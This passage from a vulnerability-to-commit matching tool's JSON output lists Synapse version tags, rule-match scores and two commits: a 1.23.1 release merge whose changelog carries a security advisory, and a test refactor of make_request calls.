"v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8958, 8958", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8958", - "relevance": 2 - } - ] - }, - { - "commit_id": "320e8c806462b2c65713d3fe26ac9d8674a019bf", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607513396, - "hunks": 3, - "message": "Merge tag 'v1.23.1' Synapse 1.23.1 (2020-12-09) =========================== Due to the two security issues highlighted below, server administrators are encouraged to update Synapse. We are not aware of these vulnerabilities being exploited in the wild. Security advisory ----------------- The following issues are fixed in v1.23.1 and v1.24.0. - There is a denial of service attack ([CVE-2020-26257](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26257)) against the federation APIs in which future events will not be correctly sent to other servers over federation. This affects all servers that participate in open federation. (Fixed in [#8776](https://github.com/matrix-org/synapse/pull/8776)). - Synapse may be affected by OpenSSL [CVE-2020-1971](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971). Synapse administrators should ensure that they have the latest versions of the cryptography Python package installed. To upgrade Synapse along with the cryptography package: * Administrators using the [`matrix.org` Docker image](https://hub.docker.com/r/matrixdotorg/synapse/) or the [Debian/Ubuntu packages from `matrix.org`](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#matrixorg-packages) should ensure that they have version 1.24.0 or 1.23.1 installed: these images include the updated packages. * Administrators who have [installed Synapse from source](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#installing-from-source) should upgrade the cryptography package within their virtualenv by running: ```sh /bin/pip install 'cryptography>=3.3' ``` * Administrators who have installed Synapse from distribution packages should consult the information from their distributions. Bugfixes -------- - Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body. ([\\#8776](https://github.com/matrix-org/synapse/issues/8776)) Internal Changes ---------------- - Add a maximum version for pysaml2 on Python 3.5. ([\\#8898](https://github.com/matrix-org/synapse/issues/8898))", - "diff": [ - "diff --cc CHANGES.md", - "index 677afeebc,55f53eb69..81b12e9b9", - "--- a/CHANGES.md", - "+++ b/CHANGES.md", - "@@@ -1,134 -1,53 +1,188 @@@", - " +Synapse 1.24.0 (2020-12-09)", - " +===========================", - " +", - " +Due to the two security issues highlighted below, server administrators are", - " +encouraged to update Synapse. We are not aware of these vulnerabilities being", - " +exploited in the wild.", - " +", - " +Security advisory", - " +-----------------", - " +", - " +The following issues are fixed in v1.23.1 and v1.24.0.", - " +", - " +- There is a denial of service attack", - " + ([CVE-2020-26257](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26257))", - " + against the federation APIs in which future events will not be correctly sent", - " + to other servers over federation. This affects all servers that participate in", - " + open federation. (Fixed in [#8776](https://github.com/matrix-org/synapse/pull/8776)).", - " +", - " +- Synapse may be affected by OpenSSL", - " + [CVE-2020-1971](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971).", - " + Synapse administrators should ensure that they have the latest versions of", - " + the cryptography Python package installed.", - " +", - " +To upgrade Synapse along with the cryptography package:", - " +", - " +* Administrators using the [`matrix.org` Docker", - " + image](https://hub.docker.com/r/matrixdotorg/synapse/) or the [Debian/Ubuntu", - " + packages from", - " + `matrix.org`](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#matrixorg-packages)", - " + should ensure that they have version 1.24.0 or 1.23.1 installed: these images include", - " + the updated packages.", - " +* Administrators who have [installed Synapse from", - " + source](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#installing-from-source)", - " + should upgrade the cryptography package within their virtualenv by running:", - " + ```sh", - " + /bin/pip install 'cryptography>=3.3'", - " + ```", - " +* Administrators who have installed Synapse from distribution packages should", - " + consult the information from their distributions.", - " +", - " +Internal Changes", - " +----------------", - " +", - " +- Add a maximum version for pysaml2 on Python 3.5. ([\\#8898](https://github.com/matrix-org/synapse/issues/8898))", - " +", - " +", - "+ Synapse 1.23.1 (2020-12-09)", - "+ ===========================", - "+ ", - "+ Due to the two security issues highlighted below, server administrators are", - "+ encouraged to update Synapse. We are not aware of these vulnerabilities being", - "+ exploited in the wild.", - "+ ", - "+ Security advisory", - "+ -----------------", - "+ ", - "+ The following issues are fixed in v1.23.1 and v1.24.0.", - "+ ", - "+ - There is a denial of service attack", - "+ ([CVE-2020-26257](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26257))", - "+ against the federation APIs in which future events will not be correctly sent", - "+ to other servers over federation. This affects all servers that participate in", - "+ open federation. (Fixed in [#8776](https://github.com/matrix-org/synapse/pull/8776)).", - "+ ", - "+ - Synapse may be affected by OpenSSL", - "+ [CVE-2020-1971](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971).", - "+ Synapse administrators should ensure that they have the latest versions of", - "+ the cryptography Python package installed.", - "+ ", - "+ To upgrade Synapse along with the cryptography package:", - "+ ", - "+ * Administrators using the [`matrix.org` Docker", - "+ image](https://hub.docker.com/r/matrixdotorg/synapse/) or the [Debian/Ubuntu", - "+ packages from", - "+ `matrix.org`](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#matrixorg-packages)", - "+ should ensure that they have version 1.24.0 or 1.23.1 installed: these images include", - "+ the updated packages.", - "+ * Administrators who have [installed Synapse from", - "+ source](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#installing-from-source)", - "+ should upgrade the cryptography package within their virtualenv by running:", - "+ ```sh", - "+ /bin/pip install 'cryptography>=3.3'", - "+ ```", - "+ * Administrators who have installed Synapse from distribution packages should", - "+ consult the information from their distributions.", - "+ ", - "+ Bugfixes", - "+ --------", - "+ ", - "+ - Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body. ([\\#8776](https://github.com/matrix-org/synapse/issues/8776))", - "+ ", - "+ ", - "+ Internal Changes", - "+ ----------------", - "+ ", - "+ - Add a maximum version for pysaml2 on Python 3.5. ([\\#8898](https://github.com/matrix-org/synapse/issues/8898))", - "+ ", - "+ ", - " +Synapse 1.24.0rc2 (2020-12-04)", - " +==============================", - " +", - " +Bugfixes", - " +--------", - " +", - " +- Fix a regression in v1.24.0rc1 which failed to allow SAML mapping providers which were unable to redirect users to an additional page. ([\\#8878](https://github.com/matrix-org/synapse/issues/8878))", - " +", - " +", - " +Internal Changes", - " +----------------", - " +", - " +- Add support for the `prometheus_client` newer than 0.9.0. Contributed by Jordan Bancino. ([\\#8875](https://github.com/matrix-org/synapse/issues/8875))", - " +", - " +", - " +Synapse 1.24.0rc1 (2020-12-02)", - " +==============================", - " +", - " +Features", - " +--------", - " +", - " +- Add admin API for logging in as a user. ([\\#8617](https://github.com/matrix-org/synapse/issues/8617))", - " +- Allow specification of the SAML IdP if the metadata returns multiple IdPs. ([\\#8630](https://github.com/matrix-org/synapse/issues/8630))", - " +- Add support for re-trying generation of a localpart for OpenID Connect mapping providers. ([\\#8801](https://github.com/matrix-org/synapse/issues/8801), [\\#8855](https://github.com/matrix-org/synapse/issues/8855))", - " +- Allow the `Date` header through CORS. Contributed by Nicolas Chamo. ([\\#8804](https://github.com/matrix-org/synapse/issues/8804))", - " +- Add a config option, `push.group_by_unread_count`, which controls whether unread message counts in push notifications are defined as \"the number of rooms with unread messages\" or \"total unread messages\". ([\\#8820](https://github.com/matrix-org/synapse/issues/8820))", - " +- Add `force_purge` option to delete-room admin api. ([\\#8843](https://github.com/matrix-org/synapse/issues/8843))", - " +", - " +", - " +Bugfixes", - " +--------", - " +", - " +- Fix a bug where appservices may be sent an excessive amount of read receipts and presence. Broke in v1.22.0. ([\\#8744](https://github.com/matrix-org/synapse/issues/8744))", - " +- Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body. ([\\#8776](https://github.com/matrix-org/synapse/issues/8776))", - " +- Fix a bug where synctl could spawn duplicate copies of a worker. Contributed by Waylon Cude. ([\\#8798](https://github.com/matrix-org/synapse/issues/8798))", - " +- Allow per-room profiles to be used for the server notice user. ([\\#8799](https://github.com/matrix-org/synapse/issues/8799))", - " +- Fix a bug where logging could break after a call to SIGHUP. ([\\#8817](https://github.com/matrix-org/synapse/issues/8817))", - " +- Fix `register_new_matrix_user` failing with \"Bad Request\" when trailing slash is included in server URL. Contributed by @angdraug. ([\\#8823](https://github.com/matrix-org/synapse/issues/8823))", - " +- Fix a minor long-standing bug in login, where we would offer the `password` login type if a custom auth provider supported it, even if password login was disabled. ([\\#8835](https://github.com/matrix-org/synapse/issues/8835))", - " +- Fix a long-standing bug which caused Synapse to require unspecified parameters during user-interactive authentication. ([\\#8848](https://github.com/matrix-org/synapse/issues/8848))", - " +- Fix a bug introduced in v1.20.0 where the user-agent and IP address reported during user registration for CAS, OpenID Connect, and SAML were of the wrong form. ([\\#8784](https://github.com/matrix-org/synapse/issues/8784))", - " +", - " +", - " +Improved Documentation", - " +----------------------", - " +", - " +- Clarify the usecase for a msisdn delegate. Contributed by Adrian Wannenmacher. ([\\#8734](https://github.com/matrix-org/synapse/issues/8734))", - " +- Remove extraneous comma from JSON example in User Admin API docs. ([\\#8771](https://github.com/matrix-org/synapse/issues/8771))", - " +- Update `turn-howto.md` with troubleshooting notes. ([\\#8779](https://github.com/matrix-org/synapse/issues/8779))", - " +- Fix the example on how to set the `Content-Type` header in nginx for the Client Well-Known URI. ([\\#8793](https://github.com/matrix-org/synapse/issues/8793))", - " +- Improve the documentation for the admin API to list all media in a room with respect to encrypted events. ([\\#8795](https://github.com/matrix-org/synapse/issues/8795))", - " +- Update the formatting of the `push` section of the homeserver config file to better align with the [code style guidelines](https://github.com/matrix-org/synapse/blob/develop/docs/code_style.md#configuration-file-format). ([\\#8818](https://github.com/matrix-org/synapse/issues/8818))", - " +- Improve documentation how to configure prometheus for workers. ([\\#8822](https://github.com/matrix-org/synapse/issues/8822))", - " +- Update example prometheus console. ([\\#8824](https://github.com/matrix-org/synapse/issues/8824))", - " +", - " +", - " +Deprecations and Removals", - " +-------------------------", - " +", - " +- Remove old `/_matrix/client/*/admin` endpoints which were deprecated since Synapse 1.20.0. ([\\#8785](https://github.com/matrix-org/synapse/issues/8785))", - " +- Disable pretty printing JSON responses for curl. Users who want pretty-printed output should use [jq](https://stedolan.github.io/jq/) in combination with curl. Contributed by @tulir. ([\\#8833](https://github.com/matrix-org/synapse/issues/8833))", - " +", - " +", - " +Internal Changes", - " +----------------", - " +", - " +- Simplify the way the `HomeServer` object caches its internal attributes. ([\\#8565](https://github.com/matrix-org/synapse/issues/8565), [\\#8851](https://github.com/matrix-org/synapse/issues/8851))", - " +- Add an example and documentation for clock skew to the SAML2 sample configuration to allow for clock/time difference between the homserver and IdP. Contributed by @localguru. ([\\#8731](https://github.com/matrix-org/synapse/issues/8731))", - " +- Generalise `RoomMemberHandler._locally_reject_invite` to apply to more flows than just invite. ([\\#8751](https://github.com/matrix-org/synapse/issues/8751))", - " +- Generalise `RoomStore.maybe_store_room_on_invite` to handle other, non-invite membership events. ([\\#8754](https://github.com/matrix-org/synapse/issues/8754))", - " +- Refactor test utilities for injecting HTTP requests. ([\\#8757](https://github.com/matrix-org/synapse/issues/8757), [\\#8758](https://github.com/matrix-org/synapse/issues/8758), [\\#8759](https://github.com/matrix-org/synapse/issues/8759), [\\#8760](https://github.com/matrix-org/synapse/issues/8760), [\\#8761](https://github.com/matrix-org/synapse/issues/8761), [\\#8777](https://github.com/matrix-org/synapse/issues/8777))", - " +- Consolidate logic between the OpenID Connect and SAML code. ([\\#8765](https://github.com/matrix-org/synapse/issues/8765))", - " +- Use `TYPE_CHECKING` instead of magic `MYPY` variable. ([\\#8770](https://github.com/matrix-org/synapse/issues/8770))", - " +- Add a commandline script to sign arbitrary json objects. ([\\#8772](https://github.com/matrix-org/synapse/issues/8772))", - " +- Minor log line improvements for the SSO mapping code used to generate Matrix IDs from SSO IDs. ([\\#8773](https://github.com/matrix-org/synapse/issues/8773))", - " +- Add additional error checking for OpenID Connect and SAML mapping providers. ([\\#8774](https://github.com/matrix-org/synapse/issues/8774), [\\#8800](https://github.com/matrix-org/synapse/issues/8800))", - " +- Add type hints to HTTP abstractions. ([\\#8806](https://github.com/matrix-org/synapse/issues/8806), [\\#8812](https://github.com/matrix-org/synapse/issues/8812))", - " +- Remove unnecessary function arguments and add typing to several membership replication classes. ([\\#8809](https://github.com/matrix-org/synapse/issues/8809))", - " +- Optimise the lookup for an invite from another homeserver when trying to reject it. ([\\#8815](https://github.com/matrix-org/synapse/issues/8815))", - " +- Add tests for `password_auth_provider`s. ([\\#8819](https://github.com/matrix-org/synapse/issues/8819))", - " +- Drop redundant database index on `event_json`. ([\\#8845](https://github.com/matrix-org/synapse/issues/8845))", - " +- Simplify `uk.half-shot.msc2778.login.application_service` login handler. ([\\#8847](https://github.com/matrix-org/synapse/issues/8847))", - " +- Refactor `password_auth_provider` support code. ([\\#8849](https://github.com/matrix-org/synapse/issues/8849))", - " +- Add missing `ordering` to background database updates. ([\\#8850](https://github.com/matrix-org/synapse/issues/8850))", - " +- Allow for specifying a room version when creating a room in unit tests via `RestHelper.create_room_as`. ([\\#8854](https://github.com/matrix-org/synapse/issues/8854))", - " +", - " +", - "++", - "++", - " Synapse 1.23.0 (2020-11-18)", - "diff --cc debian/changelog", - "index 9f47d12b7,0342fafdd..6b819d201", - "--- a/debian/changelog", - "+++ b/debian/changelog", - "@@@ -1,7 -1,7 +1,13 @@@", - " +matrix-synapse-py3 (1.24.0) stable; urgency=medium", - " +", - " + * New synapse release 1.24.0.", - " +", - " + -- Synapse Packaging team Wed, 09 Dec 2020 10:14:30 +0000", - " +", - "+ matrix-synapse-py3 (1.23.1) stable; urgency=medium", - "+ ", - "+ * New synapse release 1.23.1.", - "+ ", - "+ -- Synapse Packaging team Wed, 09 Dec 2020 10:40:39 +0000", - "+ ", - " matrix-synapse-py3 (1.23.0) stable; urgency=medium" - ], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8776": "", - "8898": "" - }, - "cve_refs": [ - "CVE-2020-26257", - "CVE-2020-1971" - ], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", - "relevance": 8 - }, - { - "id": "SEC_KEYWORDS_IN_MESSAGE", - "message": "The commit message contains some security-related keywords: security, attack", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: service, issue, lead, python, request, attack, version, package, affect, federation, server, denial", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8776, 8898", - "relevance": 2 - } - ] - }, - { - "commit_id": "394516ad1bb6127ab5b32a12d81ef307deb39570", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608043444, - "hunks": 744, - "message": "Remove spurious \"SynapseRequest\" result from `make_request\" This was never used, so let's get rid of it.", - "diff": [ - "diff --git a/tests/app/test_frontend_proxy.py b/tests/app/test_frontend_proxy.py", - "index 43fef5d64..e0ca28882 100644", - "--- a/tests/app/test_frontend_proxy.py", - "+++ b/tests/app/test_frontend_proxy.py", - "@@ -59,3 +59,3 @@ class FrontendProxyTests(HomeserverTestCase):", - "- _, channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", - "+ channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", - "@@ -79,3 +79,3 @@ class FrontendProxyTests(HomeserverTestCase):", - "- _, channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", - "+ channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", - "diff --git a/tests/app/test_openid_listener.py b/tests/app/test_openid_listener.py", - "index b260ab734..467033e20 100644", - "--- a/tests/app/test_openid_listener.py", - "+++ b/tests/app/test_openid_listener.py", - "@@ -75,3 +75,3 @@ class FederationReaderOpenIDListenerTests(HomeserverTestCase):", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.reactor, site, \"GET\", \"/_matrix/federation/v1/openid/userinfo\"", - "@@ -123,3 +123,3 @@ class SynapseHomeserverOpenIDListenerTests(HomeserverTestCase):", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.reactor, site, \"GET\", \"/_matrix/federation/v1/openid/userinfo\"", - "diff --git a/tests/federation/test_complexity.py b/tests/federation/test_complexity.py", - "index 0187f56e2..9ccd2d76b 100644", - "--- a/tests/federation/test_complexity.py", - "+++ b/tests/federation/test_complexity.py", - "@@ -50,3 +50,3 @@ class RoomComplexityTests(unittest.FederatingHomeserverTestCase):", - " # Get the room complexity", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/federation/unstable/rooms/%s/complexity\" % (room_1,)", - "@@ -62,3 +62,3 @@ class RoomComplexityTests(unittest.FederatingHomeserverTestCase):", - " # Get the room complexity again -- make sure it's our artificial value", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/federation/unstable/rooms/%s/complexity\" % (room_1,)", - "diff --git a/tests/federation/test_federation_server.py b/tests/federation/test_federation_server.py", - "index 3009fbb6c..cfeccc057 100644", - "--- a/tests/federation/test_federation_server.py", - "+++ b/tests/federation/test_federation_server.py", - "@@ -48,3 +48,3 @@ class FederationServerTests(unittest.FederatingHomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -97,3 +97,3 @@ class StateQueryTests(unittest.FederatingHomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/federation/v1/state/%s\" % (room_1,)", - "@@ -129,3 +129,3 @@ class StateQueryTests(unittest.FederatingHomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/federation/v1/state/%s\" % (room_1,)", - "diff --git a/tests/federation/transport/test_server.py b/tests/federation/transport/test_server.py", - "index f9e3c7a51..212fb79a0 100644", - "--- a/tests/federation/transport/test_server.py", - "+++ b/tests/federation/transport/test_server.py", - "@@ -39,5 +39,3 @@ class RoomDirectoryFederationTests(unittest.HomeserverTestCase):", - " def test_blocked_public_room_list_over_federation(self):", - "- request, channel = self.make_request(", - "- \"GET\", \"/_matrix/federation/v1/publicRooms\"", - "- )", - "+ channel = self.make_request(\"GET\", \"/_matrix/federation/v1/publicRooms\")", - " self.assertEquals(403, channel.code)", - "@@ -46,5 +44,3 @@ class RoomDirectoryFederationTests(unittest.HomeserverTestCase):", - " def test_open_public_room_list_over_federation(self):", - "- request, channel = self.make_request(", - "- \"GET\", \"/_matrix/federation/v1/publicRooms\"", - "- )", - "+ channel = self.make_request(\"GET\", \"/_matrix/federation/v1/publicRooms\")", - " self.assertEquals(200, channel.code)", - "diff --git a/tests/handlers/test_directory.py b/tests/handlers/test_directory.py", - "index 770d225ed..a39f89860 100644", - "--- a/tests/handlers/test_directory.py", - "+++ b/tests/handlers/test_directory.py", - "@@ -407,3 +407,3 @@ class TestCreateAliasACL(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -417,3 +417,3 @@ class TestCreateAliasACL(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -433,3 +433,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", b\"directory/list/room/%s\" % (room_id.encode(\"ascii\"),), b\"{}\"", - "@@ -448,3 +448,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", - " # Room list is enabled so we should get some results", - "- request, channel = self.make_request(\"GET\", b\"publicRooms\")", - "+ channel = self.make_request(\"GET\", b\"publicRooms\")", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -456,3 +456,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", - " # Room list disabled so we should get no results", - "- request, channel = self.make_request(\"GET\", b\"publicRooms\")", - "+ channel = self.make_request(\"GET\", b\"publicRooms\")", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -462,3 +462,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", - " room_id = self.helper.create_room_as(self.user_id)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", b\"directory/list/room/%s\" % (room_id.encode(\"ascii\"),), b\"{}\"", - "diff --git a/tests/handlers/test_message.py b/tests/handlers/test_message.py", - "index af4277581..f955dfa49 100644", - "--- a/tests/handlers/test_message.py", - "+++ b/tests/handlers/test_message.py", - "@@ -208,3 +208,3 @@ class ServerAclValidationTestCase(unittest.HomeserverTestCase):", - " path = \"/_matrix/client/r0/rooms/%s/redact/%s\" % (self.room_id, event_id)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", path, content={}, access_token=self.access_token", - "diff --git a/tests/handlers/test_password_providers.py b/tests/handlers/test_password_providers.py", - "index 8d5026514..f816594ee 100644", - "--- a/tests/handlers/test_password_providers.py", - "+++ b/tests/handlers/test_password_providers.py", - "@@ -553,3 +553,3 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", - " def _get_login_flows(self) -> JsonDict:", - "- _, channel = self.make_request(\"GET\", \"/_matrix/client/r0/login\")", - "+ channel = self.make_request(\"GET\", \"/_matrix/client/r0/login\")", - " self.assertEqual(channel.code, 200, channel.result)", - "@@ -562,3 +562,3 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", - " params.update({\"identifier\": {\"type\": \"m.id.user\", \"user\": user}, \"type\": type})", - "- _, channel = self.make_request(\"POST\", \"/_matrix/client/r0/login\", params)", - "+ channel = self.make_request(\"POST\", \"/_matrix/client/r0/login\", params)", - " 